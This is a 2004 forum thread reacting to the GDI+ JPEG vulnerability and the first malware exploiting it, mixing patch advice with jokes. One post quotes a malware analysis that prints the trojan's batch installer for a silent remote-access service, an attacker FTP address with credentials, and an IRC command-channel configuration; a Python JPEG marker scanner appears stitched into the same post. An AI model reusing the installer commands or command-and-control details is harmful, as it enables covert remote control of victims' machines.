Sadly, the world's first JPEG virus is real. Mark your calendars

Discussion in 'OT Technology' started by SeedyRom, Sep 28, 2004.

  1. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Many of us know of the recent exploit posted to the MS forums and here's the first actual virus associated with it. And yes, you CAN get it just by viewing the .jpg (which right now isn't an actual image but still a .jpg in 8k of code).

    Times are a changing.

    http://it.slashdot.org/it/04/09/27/2319222.shtml?tid=172&tid=218

    EDIT
    Since people seem to think they know everything and that this isn't a big deal, here's a mini FAQ for you:

    1) YES, it can infect from a hosted image and not just a download. If you aren't protected, this can happen. Links and proof within the thread.

    2) NO, Firefox doesn't guarantee you safety. That's a good start, but a downloaded image, or an image viewed in any number of viewing programs can execute it. Even an editing program. And guess what, Microsoft's patches do NOT secure other programs, which leads to...

    3) Microsoft patches are NOT the cure-all for this. It's been documented that it only fixes THEIR GDI+ problems but dozens if not hundreds of other programs have their own unique GDI paths. Here's a LINK about this. Microsoft does not account for this and their patches don't either. However, it's still a good idea to get the MS patch. Here's a link for all infected versions

    4) No, it's not the end of the world...but you SHOULD take notice. Get your patches, use Firefox, update your virus programs every few days and be as safe as you can. If you are savvy and don't get hit, many, many others still will.
     
    Last edited: Sep 28, 2004
  2. M5_Elite

    M5_Elite New Member

    Joined:
    Mar 11, 2003
    Messages:
    4,906
    Likes Received:
    0
    Location:
    Houston, TX
    :wtc: hold me
     
  3. Matt-AWD

    Matt-AWD Active Member

    Joined:
    Sep 21, 2002
    Messages:
    38,663
    Likes Received:
    1
    Location:
    OR
    Oh
    I'm using Firefox :wiggle:
     
  4. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Here's what the Easynews guys who documented the first hit on their newsgroup servers had to say about it. I'm not going to post the actual link to it or the code just to cover my own ass. Some script kiddie asshat will no doubt rehash it soon anyway. The bitch installs VNC (popular remote viewing software) and phones home as many do.

    If you don't know what a jpeg virus is, check out:
    http://news.google.com/news?q=jpeg+virus

    Swany and I wrote a quick and nasty script to scan every jpeg that comes into Easynews.com. It paged
    my cell phone at 6:47pm PDT on 9/26/2004 for the first hit, and 7:52pm PDT on 9/26/2004 for
    the second hit.

    Once this JPEG overflowed GDI+, it phoned home, connected to an ftp site and downloaded
    almost 2 megs of stuff. It installs a trojan that installs itself as a service.

    It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
    can work on a remote computer exactly as if you were right there at its keyboard."

    It phones home to the same IP that is in the usenet post headers. Then it seems
    to connect to xxx://209.171.43.27/www/system/ u/p bawz/pagdba (last time I checked, 93 users were logged in!)

    It downloads these files:


    and executes 'execute.bat', which looks like:

    regedit.exe /s radmin.reg
    nvsvc.exe /install /silence
    nvsvc.exe /pass:hardcore /port:10002 /save /silence
    nvsvc.exe /start /silence
    net start r_server

    It also installs an irc client with this config info:
    server1=irc.p2pchat.net
    port1=7777
    login=Darkbro0d
    channel=#FurQ
    password=letmein
    nick1=Track100Mbit
    nick2=Trck100#1
    sfv=1
    user=Trackmaster
    login=darkbro0d
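The Easynews quote above mentions a quick script that scanned every incoming JPEG for the malformed file. The code below is an added example, not the Easynews script or anything posted in the thread, of what such a structural check looks like: it walks the JPEG marker segments and flags any segment whose declared length is below the two-byte minimum, which is the malformation the GDI+ overflow hinges on. The sample inputs are constructed here for the test and are not real files.

```python
import struct
from typing import List

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: SOI, EOI, TEM and the RSTn restart markers.
STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))


def scan_jpeg_segments(data: bytes) -> List[str]:
    """Walk the marker segments of a JPEG and return a list of findings.

    Every marker segment is FF xx followed by a big-endian 16-bit length that
    counts the two length bytes themselves, so a value below 2 is structurally
    impossible. A decoder that subtracts 2 and trusts the result as a size (the
    2004 GDI+ bug) underflows on such a file; a scanner just reports it.
    """
    findings = []
    if len(data) < 2 or data[0] != 0xFF or data[1] != SOI:
        return ["not a JPEG: missing SOI marker"]
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            findings.append(f"offset {pos}: expected 0xFF marker byte, got 0x{data[pos]:02X}")
            break
        marker = data[pos + 1]
        if marker == 0xFF:          # 0xFF fill bytes may precede a marker
            pos += 1
            continue
        if marker in STANDALONE:
            if marker == EOI:
                break
            pos += 2
            continue
        if pos + 4 > len(data):
            findings.append(f"offset {pos}: truncated length field for marker 0x{marker:02X}")
            break
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2:
            findings.append(f"offset {pos}: marker 0x{marker:02X} declares length {length} (< 2); malformed")
            break
        if pos + 2 + length > len(data):
            findings.append(f"offset {pos}: marker 0x{marker:02X} length {length} runs past end of file")
            break
        if marker == SOS:           # entropy-coded data follows; header walk ends here
            break
        pos += 2 + length
    return findings


# Constructed samples: a minimal well-formed header (APP0 + a 3-byte COM segment)
# and one whose COM segment (0xFE) claims a length of 1.
GOOD_JPEG = bytes.fromhex("FFD8 FFE0 0010 4A46494600 0101 00 0001 0001 0000 FFFE 0005 414243 FFD9")
BAD_JPEG = bytes.fromhex("FFD8 FFFE 0001 FFD9")
```

Run over a directory of incoming files, anything that returns a non-empty list is worth quarantining before an image library ever parses it.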
     
  5. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Read the articles :patshead:

    Firefox is affected unless you get the very latest version. Stay up to date people. Also, a future revision of this might not be as easily swayed.

    Also, many people still use email programs that don't have Firefox load the images....
     
  6. Matt-AWD

    Matt-AWD Active Member

    Joined:
    Sep 21, 2002
    Messages:
    38,663
    Likes Received:
    1
    Location:
    OR
    Newest version of Firefox = not affected
     
  7. Turosh

    Turosh Guest

    no big deal
     
  8. Dr.Smasher

    Dr.Smasher .

    Joined:
    May 23, 2000
    Messages:
    19,854
    Likes Received:
    4
    Location:
    WI
    oh noes! my windoz haev crashet!
     
  9. Matt-AWD

    Matt-AWD Active Member

    Joined:
    Sep 21, 2002
    Messages:
    38,663
    Likes Received:
    1
    Location:
    OR
    Only the newest version :o
     
  10. Mustachio

    Mustachio New Member

    Joined:
    May 19, 2004
    Messages:
    3,327
    Likes Received:
    0
    :wiggle:
     
  11. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Yes, you're quick before the edit. I still wanted him to read it since not ALL Firefox is safe.
     
  12. LowkeyG

    LowkeyG OT Supporter

    Joined:
    Mar 4, 2002
    Messages:
    29,188
    Likes Received:
    0
    Location:
    Toronto
    which is that?
     
  13. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Call me when some disgruntled asshat goes wild on OT and it's shut down for an evening. I'll be bored without it. You can talk me to sleep ;)
     
  14. j1zzn1t

    j1zzn1t OT Supporter

    Joined:
    Dec 28, 2003
    Messages:
    12,074
    Likes Received:
    0
    Location:
    Dallas, TX
    i'm skeered. :wtc:
     
  15. NFS7

    NFS7 Shit, it burns!

    Joined:
    Oct 28, 2003
    Messages:
    15,280
    Likes Received:
    0
    Location:
    Los Santos, CA
    porn will nevAr be teh same again! :eek3:
     
  16. NFS7

    NFS7 Shit, it burns!

    Joined:
    Oct 28, 2003
    Messages:
    15,280
    Likes Received:
    0
    Location:
    Los Santos, CA
    now u can get viruses just as easily from secks in real life :hsugh:
     
  17. TracerBullet

    TracerBullet Active Member

    Joined:
    Aug 29, 2003
    Messages:
    155,094
    Likes Received:
    1
    Location:
    Scene of the Noodle Incident.
    If you happen to view the file with another image viewer you could be infected still.
     
  18. assclown

    assclown Active Member

    Joined:
    Mar 11, 2003
    Messages:
    92,231
    Likes Received:
    0
    Location:
    Brooklyn, NY
    It doesn't do shit unless you save it/open it with explorer.exe
     
  19. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    I've been sending letters to companies for months from the open boxes I find in my line of work. It's kinda fun to see the responses :)
     
  20. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Which no one has ever done before, right?
     
  21. fyp619

    fyp619 New Member

    Joined:
    Aug 8, 2003
    Messages:
    4,112
    Likes Received:
    0
    Location:
    LBC
    new version = 1.0? I hope :x:
     
  22. TracerBullet

    TracerBullet Active Member

    Joined:
    Aug 29, 2003
    Messages:
    155,094
    Likes Received:
    1
    Location:
    Scene of the Noodle Incident.
    1.0PR ya
     
  23. assclown

    assclown Active Member

    Joined:
    Mar 11, 2003
    Messages:
    92,231
    Likes Received:
    0
    Location:
    Brooklyn, NY
    Most people think you can post it on a forum and it will steal their megahurtz :o
     
  24. dirteemac

    dirteemac hey, how are you?

    Joined:
    Nov 14, 2001
    Messages:
    7,776
    Likes Received:
    1
    It's times like this when I'm glad I have a mac.
     
  25. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Here's the other problem. Microsoft has their patch for the vulnerability but their patch is SERIOUSLY LACKING. Others in the IT field have been made aware of this. In fact, this guy sent an open letter to MS about it and made some news about it. He finds what their shit misses because there's a TON of other apps with their own GDI+ built on to its own path. This is far more than a Microsoft product issue.

    http://isc.sans.org/gdiscan.php
     
